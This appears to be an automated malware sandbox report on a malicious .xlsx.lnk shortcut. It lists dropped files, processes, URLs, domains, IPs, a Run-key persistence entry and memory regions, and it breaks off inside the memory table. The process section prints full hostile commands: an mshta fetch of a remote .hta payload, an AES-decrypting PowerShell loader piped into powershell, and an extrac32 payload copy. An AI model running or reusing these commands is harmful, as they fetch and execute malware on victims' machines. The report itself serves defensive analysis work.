Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
FT. 40FE CNY .xlsx.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=1,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
||
C:\Users\Public\Libraries\Ucvuiswb
|
data
|
dropped
|
||
C:\Users\Public\Libraries\Ucvuiswb.PIF
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\Public\Libraries\bwsiuvcU.pif
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\Public\Libraries\easinvoker.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\Public\Libraries\netutils.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\Public\Ucvuiswb.url
|
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF">), ASCII text, with CRLF line
terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\uc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x5990b467, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\Public\Libraries\KDECO.bat
|
DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Libraries\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Libraries\UcvuiswbO.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].hta
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h2akx4p.gbt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqgntrab.1pq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzb3csfr.kno.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4fvewj.ald.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwcvnjfy.hms.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9695268fa6a0c8b2.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A20HZKL49GMHZSOAZMF6.temp
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 17 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
|
||
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK
= 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode
= [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize
= 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL
= $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE,
16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object
System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo(
$wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW
| powershell -
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
|
||
C:\Users\user\AppData\Roaming\uc.exe
|
"C:\Users\user\AppData\Roaming\uc.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
|
||
C:\Windows\SysWOW64\extrac32.exe
|
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
|
||
C:\Users\Public\Libraries\bwsiuvcU.pif
|
C:\Users\Public\Libraries\bwsiuvcU.pif
|
||
C:\Users\Public\Libraries\Ucvuiswb.PIF
|
"C:\Users\Public\Libraries\Ucvuiswb.PIF"
|
||
C:\Users\Public\Libraries\bwsiuvcU.pif
|
C:\Users\Public\Libraries\bwsiuvcU.pif
|
||
C:\Users\Public\Libraries\Ucvuiswb.PIF
|
"C:\Users\Public\Libraries\Ucvuiswb.PIF"
|
||
C:\Users\Public\Libraries\bwsiuvcU.pif
|
C:\Users\Public\Libraries\bwsiuvcU.pif
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.sessosesso.it/assets/aw/yt.htaAC:
|
unknown
|
||
https://www.sessosesso.it/
|
unknown
|
||
https://www.sessosesso.it
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.hta
|
89.46.106.29
|
||
https://www.sessosesso.it/assets/aw/yt.htaDe
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.htaU
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://zyupsq.by.files.1drv.com/
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.hta6288
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.htaPS_BROW
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.hta_
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
https://onedrive.live.com/_
|
unknown
|
||
https://www.sessosesso.it/assets/aw/uc.exep
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.hta1
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.htaindows
|
unknown
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.hta5
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://live.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://www.sessosesso.it/assets/aw/uc.exe
|
89.46.106.29
|
||
http://r3.o.lencr.org0
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.htaH
|
unknown
|
||
https://sessosesso.it
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://sectigo.com/CPS0
|
unknown
|
||
https://account.dyn.com/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.htaC:
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y
|
13.107.139.11
|
||
https://www.sessosesso.it/assets/aw/Book1.xlsx
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.hta...-
|
unknown
|
||
http://mail.irmaklarpaslanmaz.com.tr
|
unknown
|
||
http://r3.i.lencr.org/0o
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.hta...
|
unknown
|
||
https://sessosesso.it/assets/aw/Book1.xlsx
|
89.46.106.29
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://www.sessosesso.it/assets/aw/yt.htaLMEMX
|
unknown
|
||
http://www.apache.o
|
unknown
|
||
http://www.pmail.com
|
unknown
|
||
http://ocsp.sectigo.com0C
|
unknown
|
||
https://onedrive.live.com/downlo
|
unknown
|
||
https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cu
|
unknown
|
There are 50 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
sessosesso.it
|
89.46.106.29
|
||
www.sessosesso.it
|
89.46.106.29
|
||
mail.irmaklarpaslanmaz.com.tr
|
192.185.124.132
|
||
dual-spov-0006.spov-msedge.net
|
13.107.139.11
|
||
zyupsq.by.files.1drv.com
|
unknown
|
||
onedrive.live.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.185.124.132
|
mail.irmaklarpaslanmaz.com.tr
|
United States
|
||
89.46.106.29
|
sessosesso.it
|
Italy
|
||
13.107.139.11
|
dual-spov-0006.spov-msedge.net
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Ucvuiswb
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
4A0000
|
remote allocation
|
page execute and read and write
|
||
2831000
|
direct allocation
|
page execute read
|
||
3DA95000
|
heap
|
page read and write
|
||
25D95000
|
heap
|
page read and write
|
||
2385000
|
direct allocation
|
page read and write
|
||
409C0000
|
trusted library section
|
page read and write
|
||
3DDE1000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page execute and read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
25FC1000
|
trusted library allocation
|
page read and write
|
||
3DE32000
|
trusted library allocation
|
page read and write
|
||
3DD81000
|
trusted library allocation
|
page read and write
|
||
284A0000
|
trusted library section
|
page read and write
|
||
7EB10000
|
direct allocation
|
page read and write
|
||
40350000
|
trusted library section
|
page read and write
|
||
7FBF0000
|
direct allocation
|
page read and write
|
||
409B0000
|
trusted library section
|
page read and write
|
||
25F71000
|
trusted library allocation
|
page read and write
|
||
450000
|
remote allocation
|
page execute and read and write
|
||
3BD8F000
|
heap
|
page read and write
|
||
4A0000
|
remote allocation
|
page execute and read and write
|
||
2981000
|
direct allocation
|
page execute read
|
||
3DE5C000
|
trusted library allocation
|
page read and write
|
||
25FEB000
|
trusted library allocation
|
page read and write
|
||
450000
|
unkown
|
page execute and read and write
|
||
4A0000
|
remote allocation
|
page execute and read and write
|
||
28A1000
|
direct allocation
|
page execute read
|
||
7EB60000
|
direct allocation
|
page read and write
|
||
450000
|
unkown
|
page execute and read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
450000
|
remote allocation
|
page execute and read and write
|
||
3BDC9000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page execute and read and write
|
||
450000
|
unkown
|
page execute and read and write
|
||
3DA65000
|
heap
|
page read and write
|
||
4A0000
|
unkown
|
page execute and read and write
|
||
40260000
|
trusted library section
|
page read and write
|
||
23FF4000
|
heap
|
page read and write
|
||
4A0000
|
unkown
|
page execute and read and write
|
||
400000
|
unkown
|
page execute and read and write
|
||
3EDE1000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
3DDAB000
|
trusted library allocation
|
page read and write
|
||
3ED31000
|
trusted library allocation
|
page read and write
|
||
4A0000
|
unkown
|
page execute and read and write
|
||
28C40000
|
trusted library section
|
page read and write
|
||
450000
|
remote allocation
|
page execute and read and write
|
||
26F71000
|
trusted library allocation
|
page read and write
|
||
3DD31000
|
trusted library allocation
|
page read and write
|
||
7FFAABAC0000
|
trusted library allocation
|
page read and write
|
||
29730000
|
trusted library allocation
|
page read and write
|
||
41C40000
|
trusted library allocation
|
page read and write
|
||
40981000
|
trusted library allocation
|
page read and write
|
||
2B001796000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
296A0000
|
trusted library allocation
|
page read and write
|
||
7FFAABB90000
|
trusted library allocation
|
page read and write
|
||
314BA7E000
|
stack
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
2B07C0E6000
|
heap
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
409A0000
|
trusted library allocation
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
41C27000
|
trusted library allocation
|
page read and write
|
||
29E18250000
|
heap
|
page read and write
|
||
28D70000
|
trusted library allocation
|
page read and write
|
||
40BD0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
21C3411B000
|
heap
|
page read and write
|
||
28CD1000
|
heap
|
page read and write
|
||
1A2C9975000
|
trusted library allocation
|
page read and write
|
||
14976000
|
heap
|
page read and write
|
||
29700000
|
trusted library allocation
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
3BD7E000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FFAAB900000
|
trusted library allocation
|
page read and write
|
||
411C0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
13BF4000
|
direct allocation
|
page read and write
|
||
1A2C4729000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
21C33913000
|
heap
|
page read and write
|
||
40C10000
|
trusted library allocation
|
page read and write
|
||
5DA000
|
heap
|
page read and write
|
||
29E185F0000
|
heap
|
page read and write
|
||
570000
|
unkown
|
page read and write
|
||
426000
|
remote allocation
|
page execute and read and write
|
||
3BE1A000
|
heap
|
page read and write
|
||
297F0000
|
trusted library allocation
|
page read and write
|
||
7FC10000
|
direct allocation
|
page read and write
|
||
2B07C3A2000
|
heap
|
page read and write
|
||
19AC1739000
|
heap
|
page read and write
|
||
C2F37BF000
|
stack
|
page read and write
|
||
7FFAABB00000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C34A4000
|
heap
|
page read and write
|
||
21C38C00000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29E2A0E2000
|
trusted library allocation
|
page read and write
|
||
1A2C9930000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
40A51000
|
heap
|
page read and write
|
||
19AC1771000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
41D80000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
409B0000
|
trusted library allocation
|
page read and write
|
||
2B001846000
|
trusted library allocation
|
page read and write
|
||
40B99000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
13C18000
|
direct allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
7FFAABA90000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FFAABA50000
|
trusted library allocation
|
page read and write
|
||
7FFAABAE0000
|
trusted library allocation
|
page read and write
|
||
28580000
|
heap
|
page execute and read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
24095000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29E1BF38000
|
trusted library allocation
|
page read and write
|
||
40D000
|
unkown
|
page write copy
|
||
2A090000
|
heap
|
page read and write
|
||
40C8C000
|
stack
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C46D0000
|
heap
|
page read and write
|
||
40B60000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
25F4000
|
direct allocation
|
page read and write
|
||
1A2C4188000
|
heap
|
page read and write
|
||
41D70000
|
heap
|
page read and write
|
||
2434000
|
direct allocation
|
page read and write
|
||
1A2C4306000
|
heap
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
40A20000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C4730000
|
heap
|
page read and write
|
||
41DB0000
|
trusted library allocation
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
314B07E000
|
unkown
|
page readonly
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
3BDFE000
|
heap
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
1A2C435E000
|
heap
|
page read and write
|
||
40AB0000
|
trusted library allocation
|
page read and write
|
||
29690000
|
trusted library allocation
|
page read and write
|
||
296C2000
|
trusted library allocation
|
page read and write
|
||
29E182D7000
|
heap
|
page read and write
|
||
40BA0000
|
trusted library allocation
|
page read and write
|
||
41A7E000
|
stack
|
page read and write
|
||
314B27E000
|
unkown
|
page readonly
|
||
95F000
|
stack
|
page read and write
|
||
300E000
|
stack
|
page read and write
|
||
8A0000
|
unkown
|
page execute and read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
29730000
|
trusted library allocation
|
page read and write
|
||
7FFAABB70000
|
trusted library allocation
|
page read and write
|
||
28E0C000
|
stack
|
page read and write
|
||
314A87B000
|
stack
|
page read and write
|
||
41480000
|
trusted library allocation
|
page read and write
|
||
25B32000
|
trusted library allocation
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
25C2C000
|
stack
|
page read and write
|
||
1A2C4377000
|
heap
|
page read and write
|
||
2A000000
|
trusted library allocation
|
page read and write
|
||
245A000
|
direct allocation
|
page read and write
|
||
40AD0000
|
trusted library allocation
|
page read and write
|
||
3D8F0000
|
heap
|
page read and write
|
||
314B97E000
|
unkown
|
page readonly
|
||
3D8B7000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB05F46000
|
unkown
|
page readonly
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
28CB000
|
direct allocation
|
page read and write
|
||
7EB40000
|
direct allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
1413F000
|
stack
|
page read and write
|
||
2B07A300000
|
trusted library allocation
|
page read and write
|
||
7FFAAB850000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
29E1C098000
|
trusted library allocation
|
page read and write
|
||
13F1E000
|
stack
|
page read and write
|
||
21C38D60000
|
trusted library allocation
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
1A2C4368000
|
heap
|
page read and write
|
||
40B8C000
|
stack
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
41A30000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C4391000
|
heap
|
page read and write
|
||
7FFAAB9F2000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
41420000
|
trusted library allocation
|
page read and write
|
||
41564000
|
trusted library allocation
|
page read and write
|
||
41345000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
2A000000
|
trusted library allocation
|
page read and write
|
||
41564000
|
trusted library allocation
|
page read and write
|
||
41C20000
|
trusted library allocation
|
page read and write
|
||
1A2C41D0000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
1405E000
|
stack
|
page read and write
|
||
1A2C42F2000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
13FFF000
|
stack
|
page read and write
|
||
296B1000
|
trusted library allocation
|
page read and write
|
||
1A2C4326000
|
heap
|
page read and write
|
||
40B80000
|
trusted library allocation
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
29CB0000
|
remote allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C4334000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
41263000
|
heap
|
page read and write
|
||
296F0000
|
trusted library allocation
|
page read and write
|
||
3BFAF000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
13C4F000
|
direct allocation
|
page read and write
|
||
1A2C437F000
|
heap
|
page read and write
|
||
426000
|
remote allocation
|
page execute and read and write
|
||
D936EBE000
|
stack
|
page read and write
|
||
40A30000
|
trusted library allocation
|
page read and write
|
||
2868F000
|
stack
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
572000
|
unkown
|
page write copy
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
21C3387C000
|
heap
|
page read and write
|
||
29E1BDE3000
|
trusted library allocation
|
page read and write
|
||
314C37E000
|
unkown
|
page readonly
|
||
40BA0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
3BEC0000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
3DA3F000
|
stack
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
6EC56000
|
unkown
|
page readonly
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C4366000
|
heap
|
page read and write
|
||
21C0000
|
direct allocation
|
page read and write
|
||
C2F337E000
|
stack
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
41441000
|
trusted library allocation
|
page read and write
|
||
2B07A040000
|
heap
|
page read and write
|
||
4F0000
|
unkown
|
page execute and read and write
|
||
29E2A071000
|
trusted library allocation
|
page read and write
|
||
7FFAABA50000
|
trusted library allocation
|
page read and write
|
||
A80000
|
direct allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
2B07A2F0000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
314B67E000
|
unkown
|
page readonly
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C4364000
|
heap
|
page read and write
|
||
1A2C35B8000
|
trusted library allocation
|
page read and write
|
||
41420000
|
trusted library allocation
|
page read and write
|
||
25B80000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41C1000
|
heap
|
page read and write
|
||
6FE000
|
stack
|
page read and write
|
||
41442000
|
trusted library allocation
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
